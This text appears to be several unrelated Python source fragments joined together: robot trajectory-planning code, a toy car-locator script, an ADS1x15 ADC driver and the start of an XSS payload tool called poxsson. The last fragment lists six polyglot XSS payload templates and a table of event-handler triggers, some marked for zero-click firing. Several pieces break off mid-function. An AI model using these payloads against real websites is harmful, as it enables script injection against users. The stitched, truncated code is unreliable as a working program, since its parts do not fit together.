# current_ref_traj, current_ref_inputs: reference trajectory and reference inputs as Nx(n_states) ndarrays  # TODO: add shapes
# Outputs:
# x_casadi, u_casadi: trajectory states and inputs returned by Casadi
# if solution found:
# states: (N+1)x(n_states) ndarray e.g. [[1 2 0], [1.2 2.4 0], [2 3.5 0]]
# controls: (N)x(n_controls) ndarray e.g. [[0.5 0], [1 0.01], [1.2 -0.01]]
# else, [],[] returned
# """
#
# # Create an initial state trajectory that roughly accomplishes the desired state transfer (by interpolating)
# init_states_param = np.linspace(0, 1, N + 1)
# init_states = np.zeros([N + 1, n_states])
# dx = xT - x0
# for i in range(N + 1):
# init_states[i] = (x0 + init_states_param[i] * dx).flatten()
#
# # Create an initial input trajectory that roughly accomplishes the desired state transfer
# # (using interpolated states to compute rough estimate of controls)
# dist = la.norm(xT[0:2] - x0[0:2])
# ang_dist = xT[2][0] - x0[2][0]
# total_time = N * T
# const_vel = dist / total_time
# const_ang_vel = ang_dist / total_time
# init_inputs = np.array([const_vel, const_ang_vel] * N).reshape(-1, 2)
#
# ## set parameter
# constraint_states = []
# # constraint_states.append(x0.reshape(n_states))
#
#
# for ref_state in current_ref_traj:
# constraint_states.append(ref_state.reshape(n_states))
# constraint_states = np.array(constraint_states)
#
# init_inputs = []
# for ref_input in current_ref_inputs:
# init_inputs.append(ref_input.reshape(n_controls))
# init_inputs = np.array(init_inputs)
#
# solver.set_value(P, constraint_states)
# solver.set_value(STARTIDX, start_idx)
# solver.set_value(OBSPAD, obs_pad)
# solver.set_value(ENVPAD, env_pad)
# solver.set_initial(X, constraint_states)
# solver.set_initial(U, init_inputs)
# try:
# res = solver.solve()
# except Exception:
# print('Steering NLP Failed')
# return [], []
#
# # Update the cost_total
# # cost_total = res.value(self.obj) # self.opti.debug.value(self.obj)
# # Obtain the optimal control input sequence
# u_casadi = res.value(U) # shape: (N, n_controls)
# # Get the predicted state trajectory for N time steps ahead
# x_casadi = res.value(X) # shape: # (N+1, n_states)
#
# print('delta', res.value(DELTA))
#
# return x_casadi, u_casadi
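The commented-out steering code above seeds the NLP with a straight-line interpolation between x0 and xT and constant-rate inputs. A NumPy-only sketch of that warm start (function name and 1-D state layout are assumptions for illustration):

```python
import numpy as np

def interpolated_initial_guess(x0, xT, N, T):
    # Sketch of the warm start above: linearly interpolate states from x0
    # to xT over N steps, then derive constant linear/angular velocities.
    # x0, xT are (n_states,) arrays laid out as [x, y, heading]; T is the
    # time step. This is illustrative, not the solver's actual interface.
    alphas = np.linspace(0.0, 1.0, N + 1)
    init_states = x0 + alphas[:, None] * (xT - x0)      # (N+1, n_states)

    total_time = N * T
    const_vel = np.linalg.norm(xT[:2] - x0[:2]) / total_time
    const_ang_vel = (xT[2] - x0[2]) / total_time
    init_inputs = np.tile([const_vel, const_ang_vel], (N, 1))  # (N, 2)
    return init_states, init_inputs

states, inputs = interpolated_initial_guess(
    np.array([0.0, 0.0, 0.0]), np.array([3.0, 4.0, np.pi / 2]), N=10, T=0.1)
```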
# def get_padded_edges():
# '''
# Finds the left, right, top, and bottom padded (by robot radius) edges for the obstacles and the environment
# Outputs:
# obs_edges = edges of obstacles in the form of a list where each element is a dictionary with "top","bottom", "right", and "left"
# env_edges = edges of environment in the form of a dictionary with "top","bottom", "right", and "left"
# obs_edges should be used as (x < "left") or (x > "right") or (y < "bottom") or (y > "top")
# env_edges should be used as (x > "left") and (x < "right") and (y > "bottom") and (y < "top")
# '''
# randArea1 = copy.copy(RANDAREA) # [xmin,xmax,ymin,ymax]
# obstacleList1 = copy.copy(OBSTACLELIST) # [ox,oy,wd,ht]
#
# # environment bounds
# xmin = randArea1[0]
# xmax = randArea1[1]
# ymin = randArea1[2]
# ymax = randArea1[3]
# # thickness of env edges (doesn't matter much, anything > 0 works)
# thickness = 0.1
# # original environment area - width and height
# width = xmax - xmin
# height = ymax - ymin
#
# env_edges = {"left": xmin+ROBRAD, "right": xmax-ROBRAD, "bottom": ymin+ROBRAD, "top": ymax-ROBRAD} # environment edges
# obs_edges = []
#
# # add enough padding for obstacles for robot radius
# for obs in obstacleList1:
# xmin = obs[0] - ROBRAD
# xmax = xmin + obs[2] + (2 * ROBRAD)
# ymin = obs[1] - ROBRAD
# ymax = ymin + obs[3] + (2 * ROBRAD)
# edges = {"left": xmin, "right": xmax, "bottom": ymin, "top": ymax}
# obs_edges.append(edges)
#
# return obs_edges, env_edges
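The obstacle inflation above grows each rectangle by the robot radius on every side, so collision checks can treat the robot as a point. A pure-Python sketch of one obstacle's padding (the ROBRAD value is a placeholder):

```python
# Sketch of the padding logic above for a single obstacle given as
# [ox, oy, width, height]; ROBRAD is an illustrative robot radius.
ROBRAD = 0.5

def pad_obstacle(obs, robrad=ROBRAD):
    xmin = obs[0] - robrad
    xmax = xmin + obs[2] + 2 * robrad   # width grows by a radius on each side
    ymin = obs[1] - robrad
    ymax = ymin + obs[3] + 2 * robrad
    return {"left": xmin, "right": xmax, "bottom": ymin, "top": ymax}

edges = pad_obstacle([2.0, 3.0, 1.0, 2.0])
```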
# def find_dr_padding(alfa, N, obs_edges, horizon_covars):
# '''
# Finds DR padding value for each environment and obstacle edge
# '''
# xDir = np.array([1, 0, 0]) # x direction
# yDir = np.array([0, 1, 0]) # y direction
# num_obs = len(obs_edges)
#
# env_pad = np.zeros([N + 1, 4]) # for each time step, the four environment edges have their own dr padding (right, left, top, bottom)
# obs_pad = np.zeros([N + 1, 4 * num_obs]) # for each time step, each obstacle edge has its own dr padding (right, left, top, bottom)
#
# # find tightening value for all alfa values delta = sqrt((1-alfa)/alfa)
# alpha = np.array(alfa, float)
# delta = (1-alpha) / alpha
# delta = delta**(0.5)
#
# for n in range(1,N+1): # skip the first time step (no DR padding there - it is already realized)
# sigma = horizon_covars[n-1] # this step's covariance
#
# # environment dr padding
# rl_pad = delta[0] * math.sqrt(xDir.T @ sigma @ xDir) # padding along right/left direction
# tb_pad = delta[0] * math.sqrt(yDir.T @ sigma @ yDir) # padding along top/bottom direction
# env_pad[n, 0] = rl_pad # right
# env_pad[n, 1] = rl_pad # left
# env_pad[n, 2] = tb_pad # top
# env_pad[n, 3] = tb_pad # bottom
#
# # obstacle padding
# for ob in range(num_obs): # for every obstacle, do the above
# rl_pad = delta[ob+1] * math.sqrt(xDir.T @ sigma @ xDir) # padding along right/left direction
# tb_pad = delta[ob+1] * math.sqrt(yDir.T @ sigma @ yDir) # padding along top/bottom direction
# obs_pad[n, 4 * ob + 0] = rl_pad # right
# obs_pad[n, 4 * ob + 1] = rl_pad # left
# obs_pad[n, 4 * ob + 2] = tb_pad # top
# obs_pad[n, 4 * ob + 3] = tb_pad # bottom
#
# return env_pad, obs_pad
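The tightening above computes delta = sqrt((1 - alfa)/alfa) and pads each edge by delta times the state's standard deviation along that edge's direction. A dependency-free sketch of one padding value (the covariance values are illustrative):

```python
import math

# Sketch of the DR padding above: pad = delta * sqrt(d^T Sigma d), where
# delta = sqrt((1 - alfa)/alfa). Sigma here is a made-up diagonal covariance.
def dr_padding(alfa, sigma, d):
    delta = math.sqrt((1.0 - alfa) / alfa)
    # quadratic form d^T Sigma d, written out for a list-of-lists Sigma
    n = len(d)
    quad = sum(d[i] * sigma[i][j] * d[j] for i in range(n) for j in range(n))
    return delta * math.sqrt(quad)

sigma = [[0.04, 0.0, 0.0], [0.0, 0.09, 0.0], [0.0, 0.0, 0.01]]
x_pad = dr_padding(0.2, sigma, [1, 0, 0])  # right/left padding
y_pad = dr_padding(0.2, sigma, [0, 1, 0])  # top/bottom padding
```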
###############################################################################
###############################################################################
def load_pickle_file(filename):
'''
loads pickle file containing pathNodesList
'''
with open(filename, 'rb') as f:
pathNodesList = pickle.load(f)
return pathNodesList
def get_full_opt_traj_and_ctrls(pathNodesList):
'''
Extract the full state and control sequence from pathNodesList
'''
tree_node_inputs = [] # full optimal trajectory inputs
tree_node_states = [] # full optimal trajectory states
opt_traj_nodes = [] # only has the optimal trajectory using the sampled points
found_node_in_goal = False
if pathNodesList is not None:
print("Sampled paths exist")
least_cost_node = []
found_first_node = False
# find a node in the goal region
for node in pathNodesList:
x = node.means[-1, 0, :][0]
y = node.means[-1, 1, :][0]
xmin_goal = GOALAREA[0]
xmax_goal = GOALAREA[1]
ymin_goal = GOALAREA[2]
ymax_goal = GOALAREA[3]
if (x > xmin_goal) and (x < xmax_goal) and (y > ymin_goal) and (y < ymax_goal):
found_node_in_goal = True
if not found_first_node:
least_cost_node = node
found_first_node = True
elif node.cost < least_cost_node.cost:
least_cost_node = copy.copy(node)
goal_node = least_cost_node
# if a node in the goal region is not found, return
if not found_node_in_goal:
print("No node in goal region found")
return
else:
print('Found path with cost: ', goal_node.cost)
# if a node in the goal region is found, construct the optimal trajectory
traj = []
ctrl_inputs = []
num_traj_states = len(goal_node.means)
node_pt = [goal_node.means[-1, 0, :][0], goal_node.means[-1, 1, :][0], goal_node.means[-1, 2, :][0]]
for i in range(num_traj_states-1):
pt = [goal_node.means[i, 0, :][0], goal_node.means[i, 1, :][0], goal_node.means[i, 2, :][0]]
traj.append(pt)
ctrl = [goal_node.inputCommands[i, 0], goal_node.inputCommands[i, 1]]
ctrl_inputs.append(ctrl)
opt_traj_nodes = [node_pt] + opt_traj_nodes
tree_node_states = traj + tree_node_states #+ [node_pt]
tree_node_inputs = ctrl_inputs + tree_node_inputs
# find index of parent
idx_of_parent_node = goal_node.parent
while idx_of_parent_node != None: # if parent found
parent_node = pathNodesList[idx_of_parent_node] # get parent node
# add parent node info to data
traj = []
ctrl_inputs = []
node_pt = [parent_node.means[-1, 0, :][0], parent_node.means[-1, 1, :][0], parent_node.means[-1, 2, :][0]]
num_traj_states = len(parent_node.means)
for i in range(num_traj_states-2):
pt = [parent_node.means[i, 0, :][0], parent_node.means[i, 1, :][0], parent_node.means[i, 2, :][0]]
traj.append(pt)
ctrl = [parent_node.inputCommands[i, 0], parent_node.inputCommands[i, 1]]
ctrl_inputs.append(ctrl)
opt_traj_nodes = [node_pt] + opt_traj_nodes
tree_node_states = traj + tree_node_states
tree_node_inputs = ctrl_inputs + tree_node_inputs
# find index of parent
idx_of_parent_node = parent_node.parent
print('Number of steps: ', len(np.array(tree_node_states)))
return [np.array(opt_traj_nodes), np.array(tree_node_states), np.array(tree_node_inputs)]
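The reconstruction above walks parent indices from the goal node back to the root, prepending each segment so the result runs start to goal. The core backtracking idea, sketched with a simplified stand-in node layout:

```python
# Sketch of parent-pointer backtracking: follow "parent" indices from the
# goal to the root (parent is None), prepending points along the way.
# The node dicts here are a simplified stand-in for the tree nodes above.
def backtrack(nodes, goal_idx):
    order = []
    idx = goal_idx
    while idx is not None:
        order = [nodes[idx]["point"]] + order
        idx = nodes[idx]["parent"]
    return order

nodes = [
    {"point": (0, 0), "parent": None},   # root
    {"point": (1, 1), "parent": 0},
    {"point": (2, 3), "parent": 1},      # goal
]
path = backtrack(nodes, 2)
```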
def get_sampled_traj_and_ctrls(pathNodesList):
'''
Extract the nodes and control sequence at each node from pathNodesList
'''
start_state = []
control_inputs = []
state_trajectory = []
for k, node in enumerate(pathNodesList):
point = [node.means[-1, 0, :][0], node.means[-1, 1, :][0], node.means[-1, 2, :][0]]
ctrls = node.inputCommands
if k == 0:
start_state.append(point)
state_trajectory.append(point)
control_inputs.append(ctrls)
else:
state_trajectory.append(point)
control_inputs.append(ctrls)
tree_states, tree_ctrl = reshape_data(state_trajectory, control_inputs, 3) # 3 = num states
return [start_state, tree_states, tree_ctrl]
def reshape_data(state_trajectory, control_inputs, numstates):
'''
Reshapes the data of get_sampled_traj_and_ctrls
'''
traj = np.array(state_trajectory)
len_traj = len(state_trajectory)
traj = traj.reshape(len_traj, numstates)
ctrl = np.array(control_inputs)
return [traj, ctrl]
def plot_data(tree_states, sampled_opt_traj_nodes_, full_opt_traj_states, full_opt_traj_ctrls, new_filename, save_opt_path_plot):
'''
plots a figure (and saves it) with the extracted optimal trajectory and inputs along the heading direction
'''
# all sampled points
x_sampled = tree_states[:, 0]
y_sampled = tree_states[:, 1]
# select nodes for optimal trajectory | |
"""
Autonomous Car Locator
This is a program that helps autonomous cars to find out the location and direction
of other autonomous cars. It is all based on what is provided by the car and from what the car detects.
By <NAME>
"""
import random
def locator():
cars = [
{
"speed" : 50, #the speed of the current car
"compass" : "N", #the direction of the current car
"id" : 1423456, #the ID number of the car
"gps" : 36.00000 #the current GPS location of the current car
}
]
def info_input(): #this is to gather the speed and compass direction of your car and the other car
i = 0
while True:
if i == 0:
print("YOUR CAR")
speed = speed_type()
cars[0]["speed"] = speed
print("The current speed of your car is " + str(cars[0]["speed"]) + "mph\n")
compass = compass_type()
cars[0]["compass"] = compass
print("The current direction of your car is " + cars[0]["compass"] + "\n")
else:
new_car = {
"speed" : 50, #the speed of the current car
"compass" : "N", #the direction of the current car
"id" : 1423456, #the ID number of the car
"gps" : 36.00000 #the current GPS location of the current car
}
print("Car " + str(i))
speed = speed_type()
new_car["speed"] = speed
print("The current speed of Car " + str(i) + " is " + str(new_car["speed"]) + "mph\n")
print("Both cars can only be traveling the same or opposite directions.")
print("Please only choose the same direction or the opposite one.")
compass = compass_type()
new_car["compass"] = compass
print("The current direction of Car " + str(i) + " is " + new_car["compass"] + "\n")
new_car["id"] = random.randrange(1420,62416,2)
cars.append(new_car)
stop_count = input("If there are no more cars to add, type [E] for End or [C] for continue.\n")
stop_count = stop_count.upper()
if stop_count == "E" or stop_count == "END":
break
i += 1
print(len(cars))
def speed_type(): #if the input for the speed is not a number then it keeps asking for the speed
val_type = "str"
while val_type != "int":
speed = input("What is the speed of the car? ")
val_type = check_user_input(speed)
speed = int(speed)
return speed
def compass_type(): #if the input for the compass direction is not a number then it keeps asking
while True: #This loop through until an input is given that is one of the options
val_type = "int"
while val_type != "str":
compass = input("What is the direction that the car is traveling? [N], [S], [E], [W] ")
val_type = check_user_input(compass)
compass = compass.upper()
if compass == "N" or compass == "S" or compass == "E" or compass == "W":
break #this verifies that the input is only as specified, then ends the loop; otherwise it continues
else:
continue
return compass
def check_user_input(value): #classifies the input as "int", "float", or "str" (avoids shadowing the built-in input)
try:
# Convert it into an integer
int(value)
val_type = "int"
except ValueError:
try:
# Convert it into a float
float(value)
val_type = "float"
except ValueError:
val_type = "str"
return val_type
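The type check above tries int() first, then float(), and falls back to "str". A self-contained sketch of the same idea, with an illustrative function name:

```python
# Sketch of the classification idea behind check_user_input: attempt the
# strictest conversion first and fall through on ValueError.
def classify(text):
    try:
        int(text)
        return "int"
    except ValueError:
        try:
            float(text)
            return "float"
        except ValueError:
            return "str"

results = [classify("55"), classify("3.5"), classify("N")]
```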
info_input()
j = 1
while len(cars) > j:
print("The ID number of the car is " + str(cars[j]["id"]))
def speed_compare():
relative_speed = "faster" #the relative speed your car is going compared to other cars
if cars[0]["speed"] > cars[j]["speed"]:
print("Your car is going faster than Car " + str(j))
relative_speed = "faster"
elif cars[0]["speed"] < cars[j]["speed"]:
print("Your car is going slower than Car " + str(j))
relative_speed = "slower"
else:
print("Your car is going the same speed as Car " + str(j))
relative_speed = "same"
return relative_speed
def compass(): #used to compare the traveling direction of the two cars
direction = "same" #default, since only same or opposite directions are allowed
if cars[0]["compass"] == cars[j]["compass"]:
print("You and Car " + str(j) + " are both going the same direction")
direction = "same"
elif cars[0]["compass"] == "N" and cars[j]["compass"] == "S":
print("You and Car " + str(j) + " are going in opposite directions")
direction = "opposite"
elif cars[0]["compass"] == "E" and cars[j]["compass"] == "W":
print("You and Car " + str(j) + " are going in opposite directions")
direction = "opposite"
elif cars[0]["compass"] == "S" and cars[j]["compass"] == "N":
print("You and Car " + str(j) + " are going in opposite directions")
direction = "opposite"
elif cars[0]["compass"] == "W" and cars[j]["compass"] == "E":
print("You and Car " + str(j) + " are going in opposite directions")
direction = "opposite"
return direction
def sensors(): #Which sensors are being triggered on your car, or where is the car is in relation to you
sensor = ["front", "right", "rear", "left"] #4 available sensors on the car, on all 4 sides
position = random.choice(sensor) #where is the other car located relative to yours
if position == "front":
print("The car is in front of your car")
elif position == "right":
print("The car is to the right of your car")
elif position == "left":
print("The car is to the left of your car")
else:
print("The car is behind your car")
return position
direction = compass()
relative_speed = speed_compare()
position = sensors()
def visual_before(): #displays what the current layout of the road is
print("\nCURRENT ROAD LAYOUT")
if direction == "same" and position == "front":
print("| | || | |")
print("| | || | " + str(j) + " |")
print("| | || Y | |")
print("| | || | |")
elif direction == "same" and position == "rear":
print("| | || | |")
print("| | || | Y |")
print("| | || " + str(j) + " | |")
print("| | || | |")
elif direction == "same" and position == "right":
print("| | || | |")
print("| | || | |")
print("| | || Y | " + str(j) + " |")
print("| | || | |")
elif direction == "same" and position == "left":
print("| | || | |")
print("| | || | |")
print("| | || " + str(j) + " | Y |")
print("| | || | |")
elif direction == "opposite":
print("| | || | |")
print("| | " + str(j) + " || | |")
print("| | || Y | |")
print("| | || | |")
def prediction(): #if the same conditions continue then this will be the predicted road layout
print("\nPREDICTED FUTURE LAYOUT")
if direction == "same" and (relative_speed == "same" or relative_speed == "slower") and position == "front":
print("The other car will remain in front of you.")
print("| | || | |")
print("| | || | " + str(j) + " |")
print("| | || Y | |")
print("| | || | |")
elif direction == "same" and (relative_speed == "same" or relative_speed == "faster") and position == "rear":
print("The other car will remain behind you.")
print("| | || | |")
print("| | || | Y |")
print("| | || " + str(j) + " | |")
print("| | || | |")
elif direction == "same" and relative_speed == "same" and position == "right":
print("The other car will remain to the right of you.")
print("| | || | |")
print("| | || | |")
print("| | || Y | " + str(j) + " |")
print("| | || | |")
elif direction == "same" and relative_speed == "same" and position == "left":
print("The other car will remain to the left of you.")
print("| | || | |")
print("| | || | |")
print("| | || " + str(j) + " | Y |")
print("| | || | |")
elif direction == "same" and relative_speed == "faster" and position == "front":
print("You will pass the other car and be in front of them.")
print("| | || | |")
print("| | || Y | |")
print("| | || | " + str(j) + " |")
print("| | || | |")
elif direction == "same" and relative_speed == "faster" and position == "left":
print("You will pass the other car and be in front of them.")
print("|    |    ||    |    |")
print("|    |    ||    | Y  |")
print("|    |    ||  " + str(j) + " |    |")
print("|    |    ||    |    |")
# The minimum delay depends on the sps: delay >= 1/sps
# We add 0.1ms to be sure
delay = 1.0/sps+0.0001
time.sleep(delay)
# Read the conversion results
result = self.i2c.readList(self.__ADS1015_REG_POINTER_CONVERT, 2)
if (self.ic == self.__IC_ADS1015):
# Shift right 4 bits for the 12-bit ADS1015 and convert to mV
return ( ((result[0] << 8) | (result[1] & 0xFF)) >> 4 )*pga/2048.0
else:
# Return a mV value for the ADS1115
# (Take signed values into account as well)
val = (result[0] << 8) | (result[1])
if val > 0x7FFF:
# Negative reading: 16-bit two's complement (subtract 0x10000, not 0xFFFF)
return (val - 0x10000)*pga/32768.0
else:
return val*pga/32768.0
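The byte-pair-to-millivolt step above recurs in every ADS1115 read method. Here it is in isolation as a sketch (ads1115_to_mV is a hypothetical helper name, not part of the driver); note the two's-complement correction for a 16-bit value subtracts 0x10000:

```python
def ads1115_to_mV(result, pga):
    """Convert a 2-byte ADS1115 conversion result to millivolts.
    result is the [high, low] byte pair read from the conversion register;
    pga is the full-scale range in mV (e.g. 6144 for +/-6.144V)."""
    val = (result[0] << 8) | result[1]
    if val > 0x7FFF:          # negative reading: 16-bit two's complement
        val -= 0x10000
    return val * pga / 32768.0
```

For example, the raw word 0x8000 maps to exactly -pga, and 0xFFFF maps to -1 LSB.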
def readADCDifferential(self, chP=0, chN=1, pga=6144, sps=250):
"Gets a differential ADC reading from channels chP and chN in mV. \
The sample rate for this mode (single-shot) can be used to lower the noise \
(low sps) or to lower the power consumption (high sps) by duty cycling, \
see data sheet page 14 for more info. \
The pga must be given in mV, see page 13 for the supported values."
# Disable comparator, Non-latching, Alert/Rdy active low
# traditional comparator, single-shot mode
config = self.__ADS1015_REG_CONFIG_CQUE_NONE | \
self.__ADS1015_REG_CONFIG_CLAT_NONLAT | \
self.__ADS1015_REG_CONFIG_CPOL_ACTVLOW | \
self.__ADS1015_REG_CONFIG_CMODE_TRAD | \
self.__ADS1015_REG_CONFIG_MODE_SINGLE
# Set channels
if ( (chP == 0) & (chN == 1) ):
config |= self.__ADS1015_REG_CONFIG_MUX_DIFF_0_1
elif ( (chP == 0) & (chN == 3) ):
config |= self.__ADS1015_REG_CONFIG_MUX_DIFF_0_3
elif ( (chP == 2) & (chN == 3) ):
config |= self.__ADS1015_REG_CONFIG_MUX_DIFF_2_3
elif ( (chP == 1) & (chN == 3) ):
config |= self.__ADS1015_REG_CONFIG_MUX_DIFF_1_3
else:
if (self.debug):
print ("ADS1x15: Invalid channels specified: %d, %d" % (chP, chN))
return -1
# Set sample per seconds, defaults to 250sps
# If sps is in the dictionary (defined in init()) it returns the value of the constant
# otherwise it returns the default data-rate constant. This saves a lot of if/elif/else code!
if (self.ic == self.__IC_ADS1015):
config |= self.spsADS1015.setdefault(sps, self.__ADS1015_REG_CONFIG_DR_1600SPS)
else:
if ( (sps not in self.spsADS1115) & self.debug):
print ("ADS1x15: Invalid sps specified: %d, using 250sps" % sps)
config |= self.spsADS1115.setdefault(sps, self.__ADS1115_REG_CONFIG_DR_250SPS)
# Set PGA/voltage range, defaults to +-6.144V
if ( (pga not in self.pgaADS1x15) & self.debug):
print ("ADS1x15: Invalid pga specified: %d, using 6144mV" % pga )
config |= self.pgaADS1x15.setdefault(pga, self.__ADS1015_REG_CONFIG_PGA_6_144V)
self.pga = pga
# Set 'start single-conversion' bit
config |= self.__ADS1015_REG_CONFIG_OS_SINGLE
# Write config register to the ADC
bytes = [(config >> 8) & 0xFF, config & 0xFF]
self.i2c.writeList(self.__ADS1015_REG_POINTER_CONFIG, bytes)
# Wait for the ADC conversion to complete
# The minimum delay depends on the sps: delay >= 1/sps
# We add 0.1ms to be sure
delay = 1.0/sps+0.0001
time.sleep(delay)
# Read the conversion results
result = self.i2c.readList(self.__ADS1015_REG_POINTER_CONVERT, 2)
if (self.ic == self.__IC_ADS1015):
# Shift right 4 bits for the 12-bit ADS1015 and convert to mV
return ( ((result[0] << 8) | (result[1] & 0xFF)) >> 4 )*pga/2048.0
else:
# Return a mV value for the ADS1115
# (Take signed values into account as well)
val = (result[0] << 8) | (result[1])
if val > 0x7FFF:
# Negative reading: 16-bit two's complement (subtract 0x10000, not 0xFFFF)
return (val - 0x10000)*pga/32768.0
else:
return val*pga/32768.0
def readADCDifferential01(self, pga=6144, sps=250):
"Gets a differential ADC reading from channels 0 and 1 in mV\
The sample rate for this mode (single-shot) can be used to lower the noise \
(low sps) or to lower the power consumption (high sps) by duty cycling, \
see data sheet page 14 for more info. \
The pga must be given in mV, see page 13 for the supported values."
return self.readADCDifferential(0, 1, pga, sps)
def readADCDifferential03(self, pga=6144, sps=250):
"Gets a differential ADC reading from channels 0 and 3 in mV \
The sample rate for this mode (single-shot) can be used to lower the noise \
(low sps) or to lower the power consumption (high sps) by duty cycling, \
see data sheet page 14 for more info. \
The pga must be given in mV, see page 13 for the supported values."
return self.readADCDifferential(0, 3, pga, sps)
def readADCDifferential13(self, pga=6144, sps=250):
"Gets a differential ADC reading from channels 1 and 3 in mV \
The sample rate for this mode (single-shot) can be used to lower the noise \
(low sps) or to lower the power consumption (high sps) by duty cycling, \
see data sheet page 14 for more info. \
The pga must be given in mV, see page 13 for the supported values."
return self.readADCDifferential(1, 3, pga, sps)
def readADCDifferential23(self, pga=6144, sps=250):
"Gets a differential ADC reading from channels 2 and 3 in mV \
The sample rate for this mode (single-shot) can be used to lower the noise \
(low sps) or to lower the power consumption (high sps) by duty cycling, \
see data sheet page 14 for more info. \
The pga must be given in mV, see page 13 for the supported values."
return self.readADCDifferential(2, 3, pga, sps)
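The sps/pga branches in these methods lean on dict.setdefault to fall back to a default register value, as the comments note. One subtlety worth making explicit: setdefault also *inserts* the default into the dict on a miss. A minimal sketch with hypothetical register constants (not the real ADS1115 bit values):

```python
# Hypothetical data-rate -> config-bits table; values are illustrative only.
DR_250SPS = 0x00A0
sps_table = {8: 0x0000, 250: DR_250SPS, 860: 0x00E0}

config = 0
# 475 SPS is not in the table, so setdefault returns (and stores) the
# 250 SPS default bits instead of raising KeyError.
config |= sps_table.setdefault(475, DR_250SPS)

assert config == DR_250SPS
assert 475 in sps_table  # side effect: the miss was memoised into the table
```

The memoisation side effect is harmless here, but it means a subsequent lookup of the same invalid rate will silently succeed.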
def startContinuousConversion(self, channel=0, pga=6144, sps=250):
"Starts the continuous conversion mode and returns the first ADC reading \
in mV from the specified channel. \
The sps controls the sample rate. \
The pga must be given in mV, see datasheet page 13 for the supported values. \
Use getLastConversionResults() to read the next values and \
stopContinuousConversion() to stop converting."
# Default to channel 0 with invalid channel, or return -1?
if (channel > 3):
if (self.debug):
print ("ADS1x15: Invalid channel specified: %d" % channel)
return -1
# Disable comparator, Non-latching, Alert/Rdy active low
# traditional comparator, continuous mode
# The last flag is the only change we need, page 11 datasheet
config = self.__ADS1015_REG_CONFIG_CQUE_NONE | \
self.__ADS1015_REG_CONFIG_CLAT_NONLAT | \
self.__ADS1015_REG_CONFIG_CPOL_ACTVLOW | \
self.__ADS1015_REG_CONFIG_CMODE_TRAD | \
self.__ADS1015_REG_CONFIG_MODE_CONTIN
# Set sample per seconds, defaults to 250sps
# If sps is in the dictionary (defined in init()) it returns the value of the constant
# otherwise it returns the default data-rate constant. This saves a lot of if/elif/else code!
if (self.ic == self.__IC_ADS1015):
config |= self.spsADS1015.setdefault(sps, self.__ADS1015_REG_CONFIG_DR_1600SPS)
else:
if ( (sps not in self.spsADS1115) & self.debug):
print ("ADS1x15: Invalid sps specified: %d, using 250sps" % sps)
config |= self.spsADS1115.setdefault(sps, self.__ADS1115_REG_CONFIG_DR_250SPS)
# Set PGA/voltage range, defaults to +-6.144V
if ( (pga not in self.pgaADS1x15) & self.debug):
print ("ADS1x15: Invalid pga specified: %d, using 6144mV" % pga )
config |= self.pgaADS1x15.setdefault(pga, self.__ADS1015_REG_CONFIG_PGA_6_144V)
self.pga = pga
# Set the channel to be converted
if channel == 3:
config |= self.__ADS1015_REG_CONFIG_MUX_SINGLE_3
elif channel == 2:
config |= self.__ADS1015_REG_CONFIG_MUX_SINGLE_2
elif channel == 1:
config |= self.__ADS1015_REG_CONFIG_MUX_SINGLE_1
else:
config |= self.__ADS1015_REG_CONFIG_MUX_SINGLE_0
# Set 'start single-conversion' bit to begin conversions
# No need to change this for continuous mode!
config |= self.__ADS1015_REG_CONFIG_OS_SINGLE
# Write config register to the ADC
# Once we write the ADC will convert continously
# we can read the next values using getLastConversionResult
bytes = [(config >> 8) & 0xFF, config & 0xFF]
self.i2c.writeList(self.__ADS1015_REG_POINTER_CONFIG, bytes)
# Wait for the ADC conversion to complete
# The minimum delay depends on the sps: delay >= 1/sps
# We add 0.5ms to be sure
delay = 1.0/sps+0.0005
time.sleep(delay)
# Read the conversion results
result = self.i2c.readList(self.__ADS1015_REG_POINTER_CONVERT, 2)
if (self.ic == self.__IC_ADS1015):
# Shift right 4 bits for the 12-bit ADS1015 and convert to mV
return ( ((result[0] << 8) | (result[1] & 0xFF)) >> 4 )*pga/2048.0
else:
# Return a mV value for the ADS1115
# (Take signed values into account as well)
val = (result[0] << 8) | (result[1])
if val > 0x7FFF:
# Negative reading: 16-bit two's complement (subtract 0x10000, not 0xFFFF)
return (val - 0x10000)*pga/32768.0
else:
return val*pga/32768.0
def startContinuousDifferentialConversion(self, chP=0, chN=1, pga=6144, sps=250):
"Starts the continuous differential conversion mode and returns the first ADC reading \
in mV as the difference from the specified channels."
#!/usr/bin/python3
import argparse
from huepy import *
import sys
import importlib
import os
import base64
import pyperclip
import subprocess
from terminaltables import SingleTable
import random
import socket
from bs4 import BeautifulSoup as bs #used by the --separator option
#import atexit
POXSSON_PATH = os.path.realpath(__file__).replace("poxsson.py", "") #Absolute path of the project directory
polyglot_triggers = [
["onload","common tags", "0-click"],
["onpageshow","body","Works only without DOM dependency"],
["onfocus","input, select, a", "Use 'autofocus' for 0-click"],
["onerror","img, input, object, link, script, video, audio","Specify wrong params to trigger error handling"],
["onanimationstart","CSS element","Fires when a CSS animation starts"],
["onanimationend","CSS element", "Fires when a CSS animation ends"],
["onstart","marquee","Fires on marquee animation start - Firefox only"],
["onfinish","marquee","Fires on marquee animation end - Firefox only"],
["ontoggle","details","Add 'open' attribute for 0-click"]
]
polyglots = {
"1" : """javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/*<svg/*/TRIGGER=PAYLOAD//>""",
"2" : "\"'--></noscript></noembed></template></title></textarea></style><script><svg TRIGGER=PAYLOAD></script>",
"3" : "'\"--></title></textarea></style></noscript></noembed></template></frameset><svg TRIGGER=PAYLOAD>",
"4" : "\"'>-->*/</noscript></title><script><svg TRIGGER=PAYLOAD></script>" ,
"5" : "\"'--></style></script><svg TRIGGER=PAYLOAD>",
"6" : """%%0ajavascript:`/*\\"/*--><svg onload='/*</template></noembed></noscript></style></title></textarea></script><html TRIGGER="/**/ PAYLOAD//'">`"""
}
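Instantiating a polyglot is plain string substitution on the literal TRIGGER and PAYLOAD placeholders. A minimal sketch with a shortened template (not one of the six above):

```python
# TRIGGER becomes an event-handler attribute, PAYLOAD becomes the JS to run.
template = "'\"--><svg TRIGGER=PAYLOAD>"
wrapped = template.replace("TRIGGER", "onload").replace("PAYLOAD", "alert(1)")
assert wrapped == "'\"--><svg onload=alert(1)>"
```

Because the placeholders are uppercase and the templates are lowercase markup, a simple str.replace is unambiguous here.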
#Obtains local IP for use with handler
def local_ip():
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect(("8.8.8.8", 80))
return s.getsockname()[0]
def print_banner():
print("")
print("")
print(green("{_______ {__ {__ {__ __ {__ __"))
print(green("{__ {__ {__ {__ {__ {__{__ {__ "))
